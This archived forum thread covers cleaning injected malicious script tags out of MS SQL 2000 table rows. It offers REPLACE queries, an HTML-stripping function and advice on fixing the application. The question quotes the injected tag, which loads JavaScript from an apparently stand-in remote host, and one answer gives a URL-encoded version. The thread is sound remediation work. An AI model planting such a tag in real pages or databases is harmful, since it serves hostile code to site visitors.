tags:

views:

191

answers:

6
+1  Q: 

Not able to remove injected script from database rows

I've been handed a MS SQL 2000 database which has been injected with malware. The malware script is as follows:

<script src=http://www.someAddress.ru/aScript.js&gt;&lt;/script&gt;

Now I want to remove this piece of code from the table rows.

As a test, I inputed < h1> Test < /h1> on a row, and successfully ran the following query:

UPDATE myTable
SET description = REPLACE (description, '<h1>','')
WHERE id = 2;

This removed the h1 tag.

But trying the same with the script tag does not work:

UPDATE myTable
set description = REPLACE (description, '<script src=http://www.someAddress.ru/aScript.js&gt;&lt;/script&gt;','')
WHERE id = 2

Why does this not work?

UPDATE 2
WOHO! I found the solution! I'm using the folloing code, which I found here: http://www.tek-tips.com/viewthread.cfm?qid=1563568&amp;page=3

-- Look for open and close HTML tags making sure a letter or / follows < ensuring its an opening
-- HTML tag or closing HTML tag and not an unencoded < symbol
CREATE FUNCTION [dbo].[udf_StripHTML]
    (@HTMLText VARCHAR(8000))
RETURNS VARCHAR(8000)
            AS
    BEGIN
    DECLARE @Start  INT
    DECLARE @End    INT
    DECLARE @Length INT
        SET @Start = CHARINDEX('<',@HTMLText)
        SET @End = CHARINDEX('>',@HTMLText,CHARINDEX('<',@HTMLText))
        SET @Length = (@End - @Start) + 1
    WHILE @Start > 0 
                AND @End > 0 
            AND @Length > 0
        BEGIN
        SET @HTMLText = STUFF(@HTMLText,@Start,@Length,'')
        SET @Start = CHARINDEX('<',@HTMLText)
        SET @End = CHARINDEX('>',@HTMLText,CHARINDEX('<',@HTMLText))
        SET @Length = (@End - @Start) + 1
        END
    RETURN Replace(LTRIM(RTRIM(@HTMLText)),'&nbsp;',' ')
    END
GO

To remove the HTML tags / scripts, I run the following query:

UPDATE mytable
SET description = [dbo].[udf_StripHTML](description)
//WHERE id = 35;

This works perfectly. Note that this script removes ALL html. So if I only want to remove < script> , I just replace '<' with '< script'.

+1  A: 

Have you tried looking for just aScript.js, the entry could be url_encoded, or something similar, so it gives something like

%3Cscript+src%3Dhttp%3A%2F%2Fwww.someAddress.ru%2FaScript.js%3E%3C%2Fscript%3E

Reread Question

Do you mean that even when you have the script tag in a column with id=2 it doesn't work? Because if its not working are you sure that it exists in row with id=2? :p

Psytronic  2009-10-29 16:20:49
Doing a SELECT in Server Manager displays the text in cleartext
Steven  2009-10-29 16:26:21
"select description from document where id = 2" ---> <script src=http://www.someAddress.ru/aScript.js></script>
Steven  2009-10-29 16:30:01
+1  A: 

Should work, unless there are other hidden characters in there you can't see, or there is some form of encoding going on. Can you SELECT a suspect row to look at more closely.

I would tend to completely DELETE FROM myTable WHERE description LIKE '%someAddress.ru%' where possible.

However, fixing the database isn't a real solution; the application must be fixed. It shouldn't ever be echoing text out of the database unencoded. If someone enters some data including the string <script> it should simply appear on the page as the literal string <script>, or in the source &lt;script>.

bobince  2009-10-29 16:30:33
I know the app must be fixed. This is justa quick and dirty fix, to get the site up and running again. I can't delete the rows, because 95% of all table rows has this script. I just need to remove the script.
Steven  2009-10-29 16:40:20
Oh, so you've had an SQL injection as well, in addition to that? Ouch. If it's something like the automated Asprox attack, you're going to get immediately owned again if you put the unfixed app back up.
bobince  2009-10-30 14:01:13
+1  A: 

Wouldn't the src attribute value be surrounded by quotes? If so, you would have to escape them to get a proper match on the replace.

CNutt  2009-10-29 16:42:37
+1  A: 

Why not try:

UPDATE myTable
set description = REPLACE (description, 'www.someAddress.ru','localhost')
WHERE id = 2

That would eliminate the immediate hijacking problem, and would likely avoid line break / funky characters problems.

Will Shaver  2009-10-29 16:46:24
Yes, that is one option. But I found the solution of removing the entire script link. See solution above.
Steven  2009-10-29 17:16:13
A: 

Hold on...

Is the database related to a financial system? Is the application under Sarbanes-Oxley? Has any fraud been committed?

Any of those things preclude you from making changes that would, "destroy evidence." Those little guys running around with "FBI" on their jackets don't take kindly to that. It would be a good thing to back it up now, and the logs (SQL and Web), and put that backup on a few DVDs. It would be better to remove the disk and put in another one (but that may not be an option).

Moving on to cleansing: bobince's direction is the correct one. Don't look for the whole SCRIPT tag, or try to find variations. Instead, look for something in the script tag that isn't part of the normal dataset. That's what you key off. If it SELECTs okay, then turn it into a DELETE and save that query, because you will need it while you turn to fixing the application (guaranteed your database will get corrupted again).

inked  2009-10-29 16:50:31
Sarbanes-Oxley: if the company running this app is publicly traded, then chances are, it is covered under SOx. If the app is in any way audited then, the auditors will need to know what's happened. Ugh, then there's change control...
inked  2009-10-29 16:57:01
I need suggestions to a solution. And if you read my comment to bobince, I can\t delete any rows.
Steven  2009-10-29 16:59:38
Oh, well, have fun trying to figure this out on your own.
inked  2009-10-29 17:09:19
A: 

You could try the following to strip the code out of your field (I'm assuming you have information in the same field that you want to keep):

update myTable
set description = case when PATINDEX('%<script%', notes) > 0 
     then SUBSTRING(notes, 1, PATINDEX('%<script%', notes)-1) + SUBSTRING(notes, PATINDEX('%script>%', notes) + 7, LEN(notes))
     else notes
     end
where id=2

You could first run a select to see if the value returned by the CASE statement is correct before running the update. It should not affect fields without a script tag in them, though.

patmortech  2009-10-29 17:12:16
Ah, thanks. Didn't see this one until I found my own solution.
Steven  2009-10-29 17:15:15

related questions

Sql to query a dbs scheme
Transform Columns into Rows
SQL Client for Mac OS X that works with MS SQL Server
How do you get leading wildcard full-text searches to work in SQL Server?
SQL Server 2000: Is there a way to tell when a record was last modified?
What's the BEST way to remove the time portion of a datetime value (SQL Server)
I need to know how much disk space a table is using in SQL Server
What's the best way to determine if a temporary table exists in SQL Server?
Appropriate pagefile size for SQL Server
Have you ever encountered a query that SQL Server could not execute because it referenced too many tables?
ASP.NET MVC "CRUD" Database Sample
How do I unit test persistence?
Best Book for a new Database Developer
Can I logically reorder columns in a table?
Best way to copy a database in SQL Server 2005/8?
Is Windows Server 2008 "Server Core" appropriate for a SQL Server instance?
Why doesn't SQL Full Text Indexing return results for words containing #?
Client collation and SQL Server 2005
Editing database records by multiple users
Deploying SQL Server Databases from Test to Live
SQL Server 2005 implementation of MySQL REPLACE INTO?
Upgrading SQL Server 6.5
How do I version my MS SQL database in SVN?
How to export data from SQL Server 2005 to MySQL
Check for changes to a SQL table?